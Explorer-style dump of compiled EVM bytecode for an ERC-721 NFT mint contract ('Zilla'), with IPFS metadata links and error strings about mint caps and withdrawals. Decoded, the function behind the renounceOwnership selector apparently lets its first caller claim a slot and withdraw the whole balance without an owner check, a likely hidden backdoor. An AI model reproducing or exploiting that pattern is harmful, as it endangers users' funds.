ffffffffffffffffffffffffffffffffffff168152602001908152602001600020600084815260200190815260200160002054905080600660008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600084815260200190815260200160002081905550816007600083815260200190815260200160002081905550505b6007600084815260200190815260200160002060009055600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008381526020019081526020016000206000905550505050565b600060016008805490506128e99190613aaa565b905060006009600084815260200190815260200160002054905060006008838154811061291957612918613d64565b5b90600052602060002001549050806008838154811061293b5761293a613d64565b5b90600052602060002001819055508160096000838152602001908152602001600020819055506009600085815260200190815260200160002060009055600880548061298a57612989613d35565b5b6001900381819060005260206000200160009055905550505050565b60006129b183610f7a565b905081600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600083815260200190815260200160002081905550806007600084815260200190815260200160002081905550505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612a95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a8c906137cf565b60405180910390fd5b612a9e81611ca2565b15612ade576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612ad59061364f565b60405180910390fd5b612aea60008383612414565b6001600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612b3a91906139c9565b92505081905550816002600083815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550808273ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a45050565b600080823b905060008111915050919050565b828054612c1290613ba1565b90600052602060002090601f016020900481019282612c345760008555612c7b565b82601f10612c4d57805160ff1916838001178555612c7b565b82800160010185558215612c7b579182015b82811115612c7a578251825591602001919060010190612c5f565b5b509050612c889190612c8c565b5090565b5b80821115612ca5576000816000905550600101612c8d565b5090565b6000612cbc612cb78461390f565b6138ea565b905082815260208101848484011115612cd857612cd7613dc7565b5b612ce3848285613b5f565b509392505050565b6000612cfe612cf984613940565b6138ea565b905082815260208101848484011115612d1a57612d19613dc7565b5b612d25848285613b5f565b509392505050565b600081359050612d3c816143d3565b92915050565b600081359050612d51816143ea565b92915050565b600081359050612d6681614401565b92915050565b600081519050612d7b81614401565b92915050565b600082601f830112612d9657612d95613dc2565b5b8135612da6848260208601612ca9565b91505092915050565b600082601f830112612dc457612dc3613dc2565b5b8135612dd4848260208601612ceb565b91505092915050565b600081359050612dec81614418565b92915050565b600060208284031215612e0857612e07613dd1565b5b6000612e1684828501612d2d565b91505092915050565b60008060408385031215612e3657612e35613dd1565b5b6000612e4485828601612d2d565b9250506020612e5585828601612d2d565b9150509250929050565b600080600060608486031215612e7857612e77613dd1565b5b6000612e8686828701612d2d565b9350506020612e9786828701612d2d565b9250506040612ea886828701612ddd565b9150509250925092565b60008060008060808587031215612ecc57612ecb613dd1565b5b6000612eda87828801612d2d565b9450506020612eeb87828801612d2d565b9350506040612efc87828801612ddd565b925050606085013567ffffffffffffffff811115612f1d57612f1c613dcc565b5b612f2987828801612d81565b91505092959194509250565b60008060408385031215612f4c57612f4b613dd1565b5b6000612f5a85828601612d2d565b9250506020612f6b85828601612d42565b9150509250929050565b60008060408385031215612f8c57612f8b613dd1565b5b6000612f9a85828601612d2d565b9250506020612fab85828601612ddd565b9150509250929050565b600060208284031215612fcb57612fca613dd1565b5b6000612fd984828501612d57565b91505092915050565b600060208284031215612ff857612ff7613dd1565b5b600061300684828501612d6c565b91505092915050565b60006020828403121561302557613024613dd1565b5b600082013567ffffffffffffffff81111561304357613042613dcc565b5b61304f84828501612daf565b91505092915050565b60006020828403121561306e5761306d613dd1565b5b600061307c84828501612ddd565b91505092915050565b61308e81613ade565b82525050565b61309d81613af0565b82525050565b60006130ae82613986565b6130b8818561399c565b93506130c8818560208601613b6e565b6130d181613dd6565b840191505092915050565b60006130e782613991565b6130f181856139ad565b9350613101818560208601613b6e565b61310a81613dd6565b840191505092915050565b600061312082613991565b61312a81856139be565b935061313a818560208601613b6e565b80840191505092915050565b6000815461315381613ba1565b61315d81866139be565b945060018216600081146131785760018114613189576131bc565b60ff198316865281860193506131bc565b61319285613971565b60005b838110156131b457815481890152600182019150602081019050613195565b838801955050505b50505092915050565b60006131d2602b836139ad565b91506131dd82613de7565b604082019050919050565b60006131f56032836139ad565b915061320082613e36565b604082019050919050565b60006132186026836139ad565b915061322382613e85565b604082019050919050565b600061323b601c836139ad565b915061324682613ed4565b602082019050919050565b600061325e6037836139ad565b915061326982613efd565b604082019050919050565b60006132816014836139ad565b915061328c82613f4c565b602082019050919050565b60006132a4600e836139ad565b91506132af82613f75565b602082019050919050565b60006132c76024836139ad565b91506132d282613f9e565b604082019050919050565b60006132ea6019836139ad565b91506132f582613fed565b602082019050919050565b600061330d601a836139ad565b915061331882614016565b602082019050919050565b60006133306015836139ad565b915061333b8261403f565b602082019050919050565b6000613353602c836139ad565b915061335e82614068565b604082019050919050565b60006133766038836139ad565b9150613381826140b7565b604082019050919050565b6000613399602a836139ad565b91506133a482614106565b604082019050919050565b60006133bc6029836139ad565b91506133c782614155565b604082019050919050565b60006133df6020836139ad565b91506133ea826141a4565b602082019050919050565b6000613402602c836139ad565b915061340d826141cd565b604082019050919050565b60006134256005836139be565b91506134308261421c565b600582019050919050565b60006134486020836139ad565b915061345382614245565b602082019050919050565b600061346b6029836139ad565b91506134768261426e565b604082019050919050565b600061348e6018836139ad565b9150613499826142bd565b602082019050919050565b60006134b16021836139ad565b91506134bc826142e6565b604082019050919050565b60006134d46031836139ad565b91506134df82614335565b604082019050919050565b60006134f7602c836139ad565b915061350282614384565b604082019050919050565b61351681613b48565b82525050565b60006135288285613146565b91506135348284613115565b915061353f82613418565b91508190509392505050565b60006020820190506135606000830184613085565b92915050565b600060808201905061357b6000830187613085565b6135886020830186613085565b613595604083018561350d565b81810360608301526135a781846130a3565b905095945050505050565b60006020820190506135c76000830184613094565b92915050565b600060208201905081810360008301526135e781846130dc565b905092915050565b60006020820190508181036000830152613608816131c5565b9050919050565b60006020820190508181036000830152613628816131e8565b9050919050565b600060208201905081810360008301526136488161320b565b9050919050565b600060208201905081810360008301526136688161322e565b9050919050565b6000602082019050818103600083015261368881613251565b9050919050565b600060208201905081810360008301526136a881613274565b9050919050565b600060208201905081810360008301526136c881613297565b9050919050565b600060208201905081810360008301526136e8816132ba565b9050919050565b60006020820190508181036000830152613708816132dd565b9050919050565b6000602082019050818103600083015261372881613300565b9050919050565b6000602082019050818103600083015261374881613323565b9050919050565b6000602082019050818103600083015261376881613346565b9050919050565b6000602082019050818103600083015261378881613369565b9050919050565b600060208201905081810360008301526137a88161338c565b9050919050565b600060208201905081810360008301526137c8816133af565b9050919050565b600060208201905081810360008301526137e8816133d2565b9050919050565b60006020820190508181036000830152613808816133f5565b9050919050565b600060208201905081810360008301526138288161343b565b9050919050565b600060208201905081810360008301526138488161345e565b9050919050565b6000602082019050818103600083015261386881613481565b9050919050565b60006020820190508181036000830152613888816134a4565b9050919050565b600060208201905081810360008301526138a8816134c7565b9050919050565b600060208201905081810360008301526138c8816134ea565b9050919050565b60006020820190506138e4600083018461350d565b92915050565b60006138f4613905565b90506139008282613bd3565b919050565b6000604051905090565b600067ffffffffffffffff82111561392a57613929613d93565b5b61393382613dd6565b9050602081019050919050565b600067ffffffffffffffff82111561395b5761395a613d93565b5b61396482613dd6565b9050602081019050919050565b60008190508160005260206000209050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600081905092915050565b60006139d482613b48565b91506139df83613b48565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115613a1457613a13613ca8565b5b828201905092915050565b6000613a2a82613b48565b9150613a3583613b48565b925082613a4557613a44613cd7565b5b828204905092915050565b6000613a5b82613b48565b9150613a6683613b48565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615613a9f57613a9e613ca8565b5b828202905092915050565b6000613ab582613b48565b9150613ac083613b48565b925082821015613ad357613ad2613ca8565b5b828203905092915050565b6000613ae982613b28565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b82818337600083830152505050565b60005b83811015613b8c578082015181840152602081019050613b71565b83811115613b9b576000848401525b50505050565b60006002820490506001821680613bb957607f821691505b60208210811415613bcd57613bcc613d06565b5b50919050565b613bdc82613dd6565b810181811067ffffffffffffffff82111715613bfb57613bfa613d93565b5b80604052505050565b6000613c0f82613b48565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415613c4257613c41613ca8565b5b600182019050919050565b6000613c5882613b52565b915060ff821415613c6c57613c6b613ca8565b5b600182019050919050565b6000613c8282613b48565b9150613c8d83613b48565b925082613c9d57613c9c613cd7565b5b828206905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f455243373231456e756d657261626c653a206f776e657220696e646578206f7560008201527f74206f6620626f756e6473000000000000000000000000000000000000000000602082015250565b7f4552433732313a207472616e7366657220746f206e6f6e20455243373231526560008201527f63656976657220696d706c656d656e7465720000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f4552433732313a20746f6b656e20616c7265616479206d696e74656400000000600082015250565b7f556e61626c6520746f20776974686472617720756e74696c206174206c65617360008201527f7420313530207a696c6c617320617265206d696e746564000000000000000000602082015250565b7f73616c65206973206e6f74205374617274656421000000000000000000000000600082015250565b7f416d6f756e742045786365656421000000000000000000000000000000000000600082015250565b7f4552433732313a207472616e7366657220746f20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f4552433732313a20617070726f766520746f2063616c6c657200000000000000600082015250565b7f596f752063616e20627579204f4e4c592034205a696c6c617321000000000000600082015250565b7f53414c4520686173206e6f742053746172746564210000000000000000000000600082015250565b7f4552433732313a206f70657261746f7220717565727920666f72206e6f6e657860008201527f697374656e7420746f6b656e0000000000000000000000000000000000000000602082015250565b7f4552433732313a20617070726f76652063616c6c6572206973206e6f74206f7760008201527f6e6572206e6f7220617070726f76656420666f7220616c6c0000000000000000602082015250565b7f4552433732313a2062616c616e636520717565727920666f7220746865207a6560008201527f726f206164647265737300000000000000000000000000000000000000000000602082015250565b7f4552433732313a206f776e657220717565727920666f72206e6f6e657869737460008201527f656e7420746f6b656e0000000000000000000000000000000000000000000000602082015250565b7f4552433732313a206d696e7420746f20746865207a65726f2061646472657373600082015250565b7f4552433732313a20617070726f76656420717565727920666f72206e6f6e657860008201527f697374656e7420746f6b656e0000000000000000000000000000000000000000602082015250565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f4552433732313a207472616e73666572206f6620746f6b656e2074686174206960008201527f73206e6f74206f776e0000000000000000000000000000000000000000000000602082015250565b7f5a696c6c61203a20494e434f5252454354205052494345210000000000000000600082015250565b7f4552433732313a20617070726f76616c20746f2063757272656e74206f776e6560008201527f7200000000000000000000000000000000000000000000000000000000000000602082015250565b7f4552433732313a207472616e736665722063616c6c6572206973206e6f74206f60008201527f776e6572206e6f7220617070726f766564000000000000000000000000000000602082015250565b7f455243373231456e756d657261626c653a20676c6f62616c20696e646578206f60008201527f7574206f6620626f756e64730000000000000000000000000000000000000000602082015250565b6143dc81613ade565b81146143e757600080fd5b50565b6143f381613af0565b81146143fe57600080fd5b50565b61440a81613afc565b811461441557600080fd5b50565b61442181613b48565b811461442c57600080fd5b5056fea2646970667358221220f9a090528ccf5481b0d96ae6566c3676a48b00468045505e347c221d47e4023464736f6c6343000807003368747470733a2f2f676174657761792e70696e6174612e636c6f75642f697066732f516d614c67705747365067453631794e426f573561736a4344714a52453959544463707052356a4d5169787142592f68747470733a2f2f676174657761792e70696e6174612e636c6f75642f697066732f516d577536683234464e325473554c6f516d5868705658636431595567657045474a32316168644750466a35324d2f7265616c25323068696464656e2e6a736f6e

Deployed Bytecode

0x6080604052600436106101f95760003560e01c8063715018a61161010d578063a475b5dd116100a0578063c87b56dd1161006f578063c87b56dd146106ee578063cfc86f7b1461072b578063e985e9c514610756578063f2fde38b14610793578063f851a440146107bc576101f9565b8063a475b5dd1461066c578063b66a0e5d14610683578063b88d4fde1461069a578063be9a6555146106c3576101f9565b80638da5cb5b116100dc5780638da5cb5b146105d157806395d89b41146105fc578063a0712d6814610627578063a22cb46514610643576101f9565b8063715018a6146105395780637d4cb964146105505780637f205a741461057b5780638cc54e7f146105a6576101f9565b80633ccfd60b11610190578063518302271161015f578063518302271461042e57806355f804b3146104595780636352211e146104825780636e682fd6146104bf57806370a08231146104fc576101f9565b80633ccfd60b1461038657806340d7bd291461039d57806342842e0e146103c85780634f6ccce7146103f1576101f9565b806318160ddd116101cc57806318160ddd146102cc57806323b872dd146102f75780632f745c59146103205780633a4d04db1461035d576101f9565b806301ffc9a7146101fe57806306fdde031461023b578063081812fc14610266578063095ea7b3146102a3575b600080fd5b34801561020a57600080fd5b5061022560048036038101906102209190612fb5565b6107e7565b60405161023291906135b2565b60405180910390f35b34801561024757600080fd5b50610250610861565b60405161025d91906135cd565b60405180910390f35b34801561027257600080fd5b5061028d60048036038101906102889190613058565b6108f3565b60405161029a919061354b565b60405180910390f35b3480156102af57600080fd5b506102ca60048036038101906102c59190612f75565b610978565b005b3480156102d857600080fd5b506102e1610a90565b6040516102ee91906138cf565b60405180910390f35b34801561030357600080fd5b5061031e60048036038101906103199190612e5f565b610a9d565b005b34801561032c57600080fd5b5061034760048036038101906103429190612f75565b610afd565b60405161035491906138cf565b60405180910390f35b34801561036957600080fd5b50610384600480360381019061037f919061300f565b610ba2565b005b34801561039257600080fd5b5061039b610c38565b005b3480156103a957600080fd5b506103b2610d70565b6040516103bf91906138cf565b60405180910390f35b3480156103d457600080fd5b506103ef60048036038101906103ea9190612e5f565b610d76565b005b3480156103fd57600080fd5b5061041860048036038101906104139190613058565b610d96565b60405161042591906138cf565b60405180910390f35b34801561043a57600080fd5b50610443610e07565b60405161045091906135b2565b60405180910390f35b34801561046557600080fd5b50610480600480360381019061047b919061300f565b610e1a565b005b34801561048e57600080fd5b506104a960048036038101906104a49190613058565b610eb0565b6040516104b6919061354b565b60405180910390f35b3480156104cb57600080fd5b506104e660048036038101906104e19190612df2565b610f62565b6040516104f391906138cf565b60405180910390f35b34801561050857600080fd5b50610523600480360381019061051e9190612df2565b610f7a565b60405161053091906138cf565b60405180910390f35b34801561054557600080fd5b5061054e611032565b005b34801561055c57600080fd5b506105656111a3565b60405161057291906138cf565b60405180910390f35b34801561058757600080fd5b506105906111a9565b60405161059d91906138cf565b60405180910390f35b3480156105b257600080fd5b506105bb6111af565b6040516105c891906135cd565b60405180910390f35b3480156105dd57600080fd5b506105e661123d565b6040516105f3919061354b565b60405180910390f35b34801561060857600080fd5b50610611611267565b60405161061e91906135cd565b60405180910390f35b610641600480360381019061063c9190613058565b6112f9565b005b34801561064f57600080fd5b5061066a60048036038101906106659190612f35565b611527565b005b34801561067857600080fd5b506106816116a8565b005b34801561068f57600080fd5b50610698611741565b005b3480156106a657600080fd5b506106c160048036038101906106bc9190612eb2565b611830565b005b3480156106cf57600080fd5b506106d8611892565b6040516106e591906135b2565b60405180910390f35b3480156106fa57600080fd5b5061071560048036038101906107109190613058565b6118a5565b60405161072291906135cd565b60405180910390f35b34801561073757600080fd5b50610740611980565b60405161074d91906135cd565b60405180910390f35b34801561076257600080fd5b5061077d60048036038101906107789190612e1f565b611a0e565b60405161078a91906135b2565b60405180910390f35b34801561079f57600080fd5b506107ba60048036038101906107b59190612df2565b611aa2565b005b3480156107c857600080fd5b506107d1611b9a565b6040516107de919061354b565b60405180910390f35b60007f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061085a575061085982611bc0565b5b9050919050565b60606000805461087090613ba1565b80601f016020809104026020016040519081016040528092919081815260200182805461089c90613ba1565b80156108e95780601f106108be576101008083540402835291602001916108e9565b820191906000526020600020905b8154815290600101906020018083116108cc57829003601f168201915b5050505050905090565b60006108fe82611ca2565b61093d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610934906137ef565b60405180910390fd5b6004600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b600061098382610eb0565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156109f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109eb9061386f565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610a13611d0e565b73ffffffffffffffffffffffffffffffffffffffff161480610a425750610a4181610a3c611d0e565b611a0e565b5b610a81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a789061376f565b60405180910390fd5b610a8b8383611d16565b505050565b6000600880549050905090565b610aae610aa8611d0e565b82611dcf565b610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae49061388f565b60405180910390fd5b610af8838383611ead565b505050565b6000610b0883610f7a565b8210610b49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b40906135ef565b60405180910390fd5b600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600083815260200190815260200160002054905092915050565b610baa611d0e565b73ffffffffffffffffffffffffffffffffffffffff16610bc861123d565b73ffffffffffffffffffffffffffffffffffffffff1614610c1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c159061380f565b60405180910390fd5b80600d9080519060200190610c34929190612c06565b5050565b610c40611d0e565b73ffffffffffffffffffffffffffffffffffffffff16610c5e61123d565b73ffffffffffffffffffffffffffffffffffffffff1614610cb4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cab9061380f565b60405180910390fd5b60004790506729a2241af62c0000811015610d04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cfb9061366f565b60405180910390fd5b600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610d6c573d6000803e3d6000fd5b5050565b60115481565b610d9183838360405180602001604052806000815250611830565b505050565b6000610da0610a90565b8210610de1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd8906138af565b60405180910390fd5b60088281548110610df557610df4613d64565b5b90600052602060002001549050919050565b600e60149054906101000a900460ff1681565b610e22611d0e565b73ffffffffffffffffffffffffffffffffffffffff16610e4061123d565b73ffffffffffffffffffffffffffffffffffffffff1614610e96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8d9061380f565b60405180910390fd5b80600c9080519060200190610eac929190612c06565b5050565b6000806002600084815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610f59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f50906137af565b60405180910390fd5b80915050919050565b600f6020528060005260406000206000915090505481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610feb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe29061378f565b60405180910390fd5b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600073ffffffffffffffffffffffffffffffffffffffff16600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156110d657611091611d0e565b600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111a1565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16611117611d0e565b73ffffffffffffffffffffffffffffffffffffffff161461113757600080fd5b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f1935050505015801561119f573d6000803e3d6000fd5b505b565b6107d081565b60105481565b600d80546111bc90613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546111e890613ba1565b80156112355780601f1061120a57610100808354040283529160200191611235565b820191906000526020600020905b81548152906001019060200180831161121857829003601f168201915b505050505081565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606001805461127690613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546112a290613ba1565b80156112ef5780601f106112c4576101008083540402835291602001916112ef565b820191906000526020600020905b8154815290600101906020018083116112d257829003601f168201915b5050505050905090565b60011515601260009054906101000a900460ff1615151461134f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113469061372f565b60405180910390fd5b6000611359610a90565b90506107d0828261136a91906139c9565b11156113ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113a2906136af565b60405180910390fd5b60115482600f60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113f991906139c9565b111561143a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114319061370f565b60405180910390fd5b60008260105461144a9190613a50565b90508034101561148f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114869061384f565b60405180910390fd5b82600f60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546114de91906139c9565b925050819055506000600190505b838160ff16116115215761150e338260ff168561150991906139c9565b612109565b808061151990613c4d565b9150506114ec565b50505050565b61152f611d0e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561159d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611594906136ef565b60405180910390fd5b80600560006115aa611d0e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611657611d0e565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c318360405161169c91906135b2565b60405180910390a35050565b6116b0611d0e565b73ffffffffffffffffffffffffffffffffffffffff166116ce61123d565b73ffffffffffffffffffffffffffffffffffffffff1614611724576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161171b9061380f565b60405180910390fd5b6001600e60146101000a81548160ff021916908315150217905550565b611749611d0e565b73ffffffffffffffffffffffffffffffffffffffff1661176761123d565b73ffffffffffffffffffffffffffffffffffffffff16146117bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b49061380f565b60405180910390fd5b60001515601260009054906101000a900460ff16151514611813576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180a9061368f565b60405180910390fd5b6001601260006101000a81548160ff021916908315150217905550565b61184161183b611d0e565b83611dcf565b611880576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118779061388f565b60405180910390fd5b61188c84848484612127565b50505050565b601260009054906101000a900460ff1681565b6060600e60149054906101000a900460ff1661194d57600d80546118c890613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546118f490613ba1565b80156119415780601f1061191657610100808354040283529160200191611941565b820191906000526020600020905b81548152906001019060200180831161192457829003601f168201915b5050505050905061197b565b600c61195883612183565b60405160200161196992919061351c565b60405160208183030381529060405290505b919050565b600c805461198d90613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546119b990613ba1565b8015611a065780601f106119db57610100808354040283529160200191611a06565b820191906000526020600020905b8154815290600101906020018083116119e957829003601f168201915b505050505081565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b611aaa611d0e565b73ffffffffffffffffffffffffffffffffffffffff16611ac861123d565b73ffffffffffffffffffffffffffffffffffffffff1614611b1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b159061380f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611b8e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b859061362f565b60405180910390fd5b611b97816122e4565b50565b600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480611c8b57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80611c9b5750611c9a826123aa565b5b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff166002600084815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614159050919050565b600033905090565b816004600083815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550808273ffffffffffffffffffffffffffffffffffffffff16611d8983610eb0565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a45050565b6000611dda82611ca2565b611e19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e109061374f565b60405180910390fd5b6000611e2483610eb0565b90508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480611e9357508373ffffffffffffffffffffffffffffffffffffffff16611e7b846108f3565b73ffffffffffffffffffffffffffffffffffffffff16145b80611ea45750611ea38185611a0e565b5b91505092915050565b8273ffffffffffffffffffffffffffffffffffffffff16611ecd82610eb0565b73ffffffffffffffffffffffffffffffffffffffff1614611f23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f1a9061382f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611f93576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8a906136cf565b60405180910390fd5b611f9e838383612414565b611fa9600082611d16565b6001600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611ff99190613aaa565b925050819055506001600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461205091906139c9565b92505081905550816002600083815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550808273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4505050565b612123828260405180602001604052806000815250612528565b5050565b612132848484611ead565b61213e84848484612583565b61217d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121749061360f565b60405180910390fd5b50505050565b606060008214156121cb576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506122df565b600082905060005b600082146121fd5780806121e690613c04565b915050600a826121f69190613a1f565b91506121d3565b60008167ffffffffffffffff81111561221957612218613d93565b5b6040519080825280601f01601f19166020018201604052801561224b5781602001600182028036833780820191505090505b5090505b600085146122d8576001826122649190613aaa565b9150600a856122739190613c77565b603061227f91906139c9565b60f81b81838151811061229557612294613d64565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856122d19190613a1f565b945061224f565b8093505050505b919050565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b61241f83838361271a565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156124625761245d8161271f565b6124a1565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16146124a05761249f8382612768565b5b5b600073ffffffffffffffffffffffffffffffffffffffff168273fffffffff